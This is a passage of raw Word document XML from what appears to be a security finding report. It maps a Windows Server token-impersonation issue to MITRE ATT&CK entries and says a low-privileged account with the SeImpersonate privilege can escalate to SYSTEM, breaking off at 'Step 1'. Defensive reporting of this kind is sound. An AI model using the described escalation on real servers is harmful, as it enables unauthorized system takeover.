                <w:t>AV:L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VI:</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VA:</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SI:</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SA:</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hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="649BE7FE">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CA1AC1" w14:textId="7654BA4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7DA9FA" w14:textId="4B830B7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BA80B1E" w14:textId="711EB757">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re955ac900d924bfc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1068</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Exploitation for Privilege Escalation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="413DAB49" w:rsidP="0D325B6E" w:rsidRDefault="413DAB49" w14:paraId="62C8917B" w14:textId="5A252D4C">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143126dbebfb406e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="413DAB49">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1134: Access Token Manipulation - Token Impersonation/Theft</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="7DB041A4">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4D868EDA">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754D5CE"/>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5E3BB6D" w14:textId="6DACA99A">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8E34890" w:rsidP="0D325B6E" w:rsidRDefault="28E34890" w14:paraId="0643FDE2" w14:textId="3A6330D7">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3b71068cd6fd40f0">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="28E34890">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1026: Privileged Account Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6A52A04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9E7444A" w14:textId="1C7C06DA">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6713C04" w14:textId="01B80E3A">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08FF79FE" w14:textId="58DC821A"/>
    <w:p w:rsidR="4F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="5B64C3C9" w14:textId="085D232E">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32670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ECEE4DE" w:rsidP="0D325B6E" w:rsidRDefault="0ECEE4DE" w14:paraId="5AAF1BEB" w14:textId="6E4F09C6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0ECEE4DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Token </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21989BDD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0ECEE4DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mpersonation on a Windows Server </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B081F08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0ECEE4DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker to steal other </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="400EE46C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="026A87B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s’</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0ECEE4DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> token</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="204970BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0ECEE4DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DFCF76C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5DD4BA79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F326701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3EDC4712">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>his allows an attacker with unauthorized access to a low-privileged account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B49D04D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34843950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B49D04D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B49D04D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B49D04D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13EBF680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B49D04D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rivilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to laterally move to NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A95F189">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or another user account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14814D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ng </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7827CE48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacke</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7424942D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14814D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09A1F806">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comp</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09A1F806">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09A1F806">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14814D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09A1F806">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7ECA216D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compromise the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="44CAC41A" w14:textId="0BF1FB72">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F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="579E38AF" w14:textId="67934630">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F32670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6389AF7" w:rsidP="0D325B6E" w:rsidRDefault="06389AF7" w14:paraId="6B8542A6" w14:textId="35086FA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Given an attacker has access to a low</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59BBABEA">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0841D991">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214779B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>account</w:t>
      </w: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 xml:space="preserve"> on the Windows Server, th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5178F0C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is vulnerability allows them to</w:t>
      </w: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C2426A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pivot </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C2426A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to a higher</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06389AF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 xml:space="preserve">authority on the system. This allows the attacker to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="425B4CA2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">gain </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full co</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B382AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntrol</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6BFE8C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">over </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the server, resulti</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 xml:space="preserve">ng in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2AEB25FB">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2AEB25F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complete co</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 xml:space="preserve">mpromise of </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the confidentiality</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C6DEE56">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, integrity, and availability of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="625913A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sensitive information and services on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="788BA9FD" w14:textId="7E33BE92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="6B6F6696" w14:textId="7F75E55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32670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F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="095F7036" w14:textId="1F497545">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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F326701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1E7372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9A860A3">
        <w:rPr>
